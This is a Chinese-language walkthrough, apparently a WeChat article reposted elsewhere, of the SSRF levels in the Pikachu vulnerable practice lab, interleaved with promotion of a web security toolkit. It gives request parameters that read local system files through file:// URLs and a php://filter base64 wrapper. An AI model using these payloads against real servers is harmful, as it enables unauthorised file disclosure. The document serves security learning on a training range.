pikachu靶场通关指南之SSRF(Server-Side Request Forgery:服务器端请求伪造)之随波逐流writeup

作者:长弓三皮 发布:2026-09-22 08:08 收录:2026-09-22 10:09 1 次阅读 约 498 字
摘要:随波逐流WEB安全工具:一站式Web安全全能工具箱!集成了50+种扫描模块,涵盖SQL注入、XSS、LFI、RCE、SSRF等经典与现代漏洞检测方式,支持内置浏览器调试、请求头实时监控、Headers自动穿透等多种高级功能,是CTF竞赛选手和网络安全学习者的必备利器!
推荐理由:本文围绕「Web安全」、「SOC」等主题展开。

逐流工作室—-探索前沿科技,分享最新软件。点击标题下蓝字“长弓三皮”关注,我们将为您提供有深度、有价值、有意思的阅读。

朋友们,现在只对常读和星标的公众号才展示大图推送,建议大家把长弓三皮设为星标”,否则可能就看不到了啦!

作者:随波逐流


pikachu WEB




随波逐流
WriteUp


打开 [随波逐流]WEB安全工具访问 pikachu

        SSRF(Server-Side Request Forgery:服务器端请求伪造)

        其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制

        导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据

        数据流:攻击者----->服务器---->目标地址

        根据后台使用的函数的不同,对应的影响和利用方法又有不一样
        PHP中下面函数的使用不当会导致SSRF:
         file_get_contents() 
        fsockopen() 
        curl_exec()            

        如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,则请做好目标地址的过滤

        SSRF(Server-Side Request Forgery:服务器端请求伪造)

        [随波逐流]WEB安全工具  打开


        一、SSRF(curl)

        ?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php

        可以改成任意网址

        ?url=file:///C:\windows\win.ini


        二、SSRF(file_get_content)

        ?file=C:\windows\win.ini

        可通过php伪协议读取指定文件

        ?file=php://filter/read=convert.base64-encode/resource=D:\phpstudy_pro\WWW\pikachu\test\phpinfo.txt












        公众号内输入
         搜索公众号+题目标题
        可搜索到此文章


        -------------------------------------------

        软件发布网址: 随波逐流信息安全网

        http://www.1o1o.xyz

        微信公众号:长弓三皮

        --------------------------------------------


        你若喜欢,为“长弓三皮”点个哦 

        转载声明:本文转载自原发布平台 (作者:长弓三皮), 原文标题《pikachu靶场通关指南之SSRF(Server-Side Request Forgery:服务器端请求伪造)之随波逐流writeup》, 查看原文。 版权归原作者及原发布平台所有,本站仅作收录与展示,未对正文内容作实质性修改; 若涉及侵权请联系本站处理。